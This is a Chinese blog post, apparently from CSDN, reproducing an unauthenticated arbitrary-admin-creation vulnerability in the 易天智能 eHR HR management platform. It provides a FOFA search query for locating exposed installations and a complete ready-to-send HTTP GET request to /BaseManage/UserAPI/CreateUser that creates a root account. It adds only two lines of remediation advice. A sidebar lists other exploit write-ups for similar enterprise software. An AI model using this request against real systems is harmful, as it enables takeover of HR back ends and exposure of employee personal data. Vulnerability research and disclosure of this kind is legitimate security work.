【漏洞复现】易天智能eHR CreateUser 任意用户添加漏洞

于 2024-09-08 14:04:07 发布
阅读量343 收藏 1
点赞数 8
分类专栏: 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45790890/article/details/142026033
版权

1 产品简介

易天智能eHR管理平台是一款功能全面、智能化的人力资源管理软件,旨在帮助企业提高人力资源管理效率和管理水平。该平台通过集成员工信息、薪酬管理、档案人事管理、绩效管理和招聘管理等多个模块,实现了人力资源管理的全面智能化管理。

2 漏洞概述

易天智能eHR管理平台 /BaseManage/UserAPI/CreateUser 接口存在任意用户添加漏洞,未经身份验证的远程攻击者可以利用此漏洞添加任意管理员用户,导致攻击者可直接管理后台,造成信息泄露,使系统处于极不安全的状态。

3 复现环境

FOFA

body="易天智能eHR管理平台"

4 漏洞复现

PoC

GET /BaseManage/UserAPI/CreateUser?Account=root&Password=123456&OuterID=888 HTTP/1.1
Host: your-ip
Accept: application/json, text/javascript, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

 

 

5 修复建议

关闭互联网暴露面或接口设置访问权限

升级至安全版本

 

 

天官赐福万无禁忌
关注
专栏目录
易天智能eHR管理平台 CreateUser 任意用户添加漏洞复现
0xSec
06-26 578
易天智能eHR管理平台 /BaseManage/UserAPI/CreateUser 接口存在任意用户添加漏洞,未经身份验证的远程攻击者可以利用此漏洞添加任意管理员用户,导致攻击者可直接管理后台,造成信息泄露,使系统处于极不安全的状态。
某联达OA任意用户登录漏洞复现
最新发布
千寻的博客
07-17 774
由于`/WebService/Lk6SyncService/DirectToOthers/GetSSOStamp.asm`j接口未作限制,导致可以通过该接口调用`admin`的`cookie`值,通过对`LoginCredence`和`LoginTimestamp`的参数修改,进而实现任意登录进去系统.
(新接口)用友GRP-U8多个接口存在SQL 注入漏洞-0day
weixin_43167326的博客
02-22 461
用友GRP-U8是用友公司推出的一款企业级管理软件,涵盖财务、人力资源、供应链等多个领域,适用于各类企业。该系统拥有灵活的定制化功能,可根据企业需求进行模块选择和定制开发,满足不同行业的管理需求。用友GRP-U8整合了企业各业务环节,实现信息共享和流程优化,帮助企业提高管理效率,降低成本,提升竞争力。
Crawlab漏洞学习——任意用户添加漏洞
记录并分享学习安全的知识点..
09-25 507
Crawlab users 的 api 存在任意用户添加,且添加为未授权接口,可通过添加后在后台进一步攻击。
某购物商城系统commodtiy接口处存在任意文件上传漏洞
weixin_43167326的博客
05-10 918
某购物商城系统commodtiy接口处存在任意文件上传漏洞,恶意攻击者可以上传恶意软件,例如后门、木马或勒索软件,以获取对服务器的远程访问权限或者破坏系统,对服务器造成极大的安全隐患。
(完整word版)易天HR软件白皮书.doc
11-23
易天HR软件不仅提供全面的功能,还注重用户体验和系统稳定性,以实现企业人力资源管理的智能化和高效化。此外,软件可能还具备高度的可定制性和可扩展性,以满足不同规模和行业企业的独特需求。通过集成先进的信息...
易天团购系统 蓝色版源代码
03-18
免费版团购系统简要介绍说明: 本团购系统为完全免费版本,无限制、无加密,由官方发布源码,可自由扩展功能、完善功能,可用于学习也可以作为商业... 易天团购系统注意事项: 1.首页 首页第一个商品显示:上传商品时钩
深圳市易天自动化设备股份有限公司创业板首次公开发行股票申请文件反馈意见.docx
12-17
深圳市易天自动化设备股份有限公司创业板首次公开发行股票申请文件反馈意见.docx
【1day】复现宏景eHR存在任意文件上传漏洞
记录并分享学习安全的知识点..
07-31 1024
北京宏景世纪软件股份有限公司(简称“宏景软件”)自成立以来始终专注于国有企事业单位人力与人才管理数智化(数字化、智能化)产品的研发和应用推广,是中国国有企事业单位人力与人才管理数智化的领航者。 宏景eHR存在任意文件上传漏洞,可经过身份认证的远程攻击者可利用此漏洞上传任意文件,最终可导致服务器失陷。
CVE-2022-40871 Dolibarr任意添加管理员与RCE漏洞分析
渗透测试研究中心
11-14 3335
0x01 漏洞简介 Dolibarr ERP & CRM <=15.0.3 is vulnerable to Eval injection. By default, any administrator can be added to the installation page of dolibarr, and if successfully added, malicious co...
一文教会如何挖掘任意用户登录漏洞
2301_80115097的博客
11-21 1314
任意用户登录漏洞以利用漏洞利用难度低、危害高、奖金高已经成为src/众测漏洞挖掘中的香饽饽,本文将分享一下众测/src中任意用户登录漏洞的挖掘思路。
登录逻辑漏洞整理集合
qq_56426046的博客
02-21 2511
如果忘记你那么容易,那我爱你干嘛!2、不安全验证邮箱/手机号。3、MVC数据对象自动绑定。4、Unicode字符处理。1.未验证邮箱/手机号。1、cookie未鉴权。5.前端验证审核绕过。2、验证码、密码回显。2、cookie鉴权。
广联达Linkworks-GetSSOStamp登录绕过
weixin_43567873的博客
03-27 352
广联达Linkworks-GetSSOStamp登录绕过
用友U8 CRM swfupload 任意文件上传漏洞复现(XVE-2024-8597)
qq_39894062的博客
04-20 931
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。
宏景eHR SQL注入漏洞复现(CNVD-2023-08743)
失心少年
06-20 1254
版权声明:本文为CSDN博主「OidBoy_G」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。原文链接:https://blog.csdn.net/qq_41904294/article/details/130944159。宏景eHR 存在SQL注入漏洞,未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令,从而窃取数据库敏感信息。宏景eHR人力资源管理软件是一款人力资源管理与数字化应用相融合,满足动态化、协同化、流程化、战略化需求的软件。宏景eHR < 8.2。
Nacos 漏洞利用
huangyongkang666的博客
01-03 8745
在src挖掘中碰到的漏洞,于是了解了一下该漏洞漏洞的利用方式
通过icon hash查IP地址
Kevin's Blog
06-03 5952
一、说明   网络空间测绘搜索引擎FOFA 和 物联网暗黑搜索引擎Shodan可以通过网站的icon计算出一个用来搜索目标的hash值:iconhash,信息收集过程中我们也可以通过iconhash去反差使用此icon的所有站点。 二、通过站点拿到iconhash 这里使用csdn的icon来举例 》》查看csdn官网,右键查看源代码,拿到icon的地址 》》访问此地址,将icon另存为本地(下载下来) 》》访问fofa将图片上传,即可查到此icon对应的iconhash 》》icon_hash如
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值